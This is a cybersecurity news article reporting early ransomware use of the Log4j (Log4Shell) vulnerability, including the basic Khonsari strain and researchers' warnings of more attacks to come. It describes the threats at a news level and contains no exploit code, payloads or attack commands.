More hints that ransomware groups eye the Log4j vulnerability

Researchers see threat actors use Log4j vulnerability to deploy ransomware, signaling grim weeks ahead.

Last week, disclosure of the Log4j vulnerability (dubbed Log4Shell) got pundits speaking of a Fukushima moment for cybersecurity.

Fears run high since the vulnerability in the widely used Java-based logging library can be easily used for remote code execution (RCE) attacks.

Exploits for the Log4j started circling the web late last week. Researchers at BitDefender soon reported the first cases of the Log4j vulnerability being used to deploy ransomware.

BitDefender's Martin Zugec spotted an attempt to deploy a novel Khonsari ransomware. The researchers named the ransomware based on the extension used on the encrypted files.

"Threat actors will now be in a race to leverage Log4j before patches are deployed, and some will likely be banking access for later use."

-Brett Callow, Threat Analyst at Emsisoft.

An analysis of the Khonsari ransomware by Matt Muir, a security researcher at Cado Security, shows a previously unseen strain of malware that targets Windows servers.

According to Muir, the ransomware weighs in at a mere 12 KB and contains only the most basic functionality needed to carry out the objective.

"Its size and simplicity is also a strength, however – at the time we ran the malware dynamically, it wasn't detected by the systems built-in Antivirus," Muir writes.

Opportunistic attempt

The simplicity of the sample might also signal an attempted test of ransomware deployment.

Researchers have noted that the ransomware note attackers deployed include dubious contact details of the said perpetrators, pointing to a person with no apparent connection with infosec or cyber underworld.

According to Brett Callow, a ransomware expert, and threat analyst at Emsisoft, the newly found ransomware might not be too serious.

"Khonsari is very basic, skid-level ransomware that references a person in its note and was quite possibly created as a malicious prank," Callow wrote CyberNews in an email.

Ransomware negotiation

An attempt to abuse a highly publicized vulnerability to deploy ransomware seems a little bit opportunistic, Muir suggests, yet there's little doubt of malicious intent.

"I think the threat actor almost certainly intended to infect some users with the ransomware, but the fact that the payload has changed does suggest that they were trying to see just how vulnerable people are to the exploit and whether or not it could be used to deploy malware," Muir explained in an email.

There are likely operational reasons why we're not seeing targeted ransomware attacks abusing the Log4j vulnerability. For example, ransomware groups tend to stay in the infected network for weeks before striking.

"For targeted ransomware - we typically see a two-week "incubation period" whilst after attackers initially enter a network, before they have spread and gained sufficient access to deploy ransomware across the whole network. So we may see more impact in the coming days and weeks," Chris Doman, co-founder, and CTO of Cado Security, told CyberNews.

The calm before the storm

More worryingly, Microsoft has already noted activities where perpetrators tried to deliver Cobal Strike, a remote access tool, via Log4j. Ransomware gangs often employ the tactic.

Nation-state actors from China, Iran, North Korea, and Turkey have been noted to scour for ways to exploit the vulnerability in the wild.

Microsoft also claims to have observed Iranian actor Phosphorus deploying ransomware, acquiring and making modifications of the Log4j exploit.

"For targeted ransomware - we typically see a two-week "incubation period" whilst after attackers initially enter a network, before they have spread and gained sufficient access to deploy ransomware across the whole network."

-Chris Doman, co-founder, and CTO of Cado Security.

MSTIC and the Microsoft 365 Defender team have also taken note of initial access brokers trying to use Log4j to gain initial access in target networks. Such threat actors are an integral part of the ransomware ecosystem that sell access points to gangs looking for extortion opportunities.

"There is a lull before the storm in terms of more nefarious activity from the Log4Shell vulnerability. We expect adversaries are likely grabbing as much access to whatever they can get right now with the view to monetize and/or capitalize on it later on," Sean Gallagher, a senior threat researcher at Sophos, claims.

According to Callow, the race to leverage Log4j has only begun. The loot is ripe for taking before all systems are patched, meaning there might be a spike in illicit activities in the coming weeks.

"Threat actors will now be in a race to leverage Log4j before patches are deployed, and some will likely be banking access for later use - meaning we could see a spike in Log4j-related security incidents, including ransomware incidents, in the coming weeks," Callow claims.

Golden age

The Log4j vulnerability in the open-source logging utility has been discovered concerning the well-known game Minecraft. The sites serving game users warned of malicious code on servers that run the Java version of the game by manipulating log messages.

Log4j is incorporated in widely used Apache-related frameworks, which means the spread of vulnerability might be like something never seen before.

Companies with servers confirmed to be vulnerable to Log4Shell attack include Apple, Amazon, Twitter, Steam, Baidu, NetEase, Tencent, Elastic and likely hundreds if not thousands more.

Cyberattacks are increasing in scale, sophistication, and scope. The last 12 months were ripe with major high-profile cyberattacks, such as the SolarWinds hack, attacks against the Colonial Pipeline, meat processing company JBS, and software firm Kaseya.

Pundits talk of a ransomware gold rush, with the number of attacks increasing over 90% in the first half of 2021 alone.

The prevalence of ransomware has forced governments to take multilateral action against the threat. It's likely a combined effort allowed to push the infamous REvil and BlackMatter cartels offline and arrest the Cl0p ransomware cartel members.

Gangs, however, either rebrand or form new groups. Most recently, LockBit 2.0 was the most active ransomware group with a whopping list of 203 victims in Q3 of 2021 alone.

An average data breach costs victims $4.24 million per incident, the highest in the 17 years. For example, the average cost stood at $3.86 million per incident last year, putting recent results at a 10% increase.

More from CyberNews

Log4Shell in broad use: Fukushima moment for cybersecurity

Meta will reward reports about scraping bugs and unprotected data sets

Oregon Anesthesiology Group suffered a cyberattack, 750,000 patients impacted by the breach

We need to put the human back into automated HR

Nation-state actors from China, Iran, North Korea, and Turkey join the Log4Shell exploitation party

Subscribe to our newsletter

Leave a Reply

Your email address will not be published. Required fields are markedmarked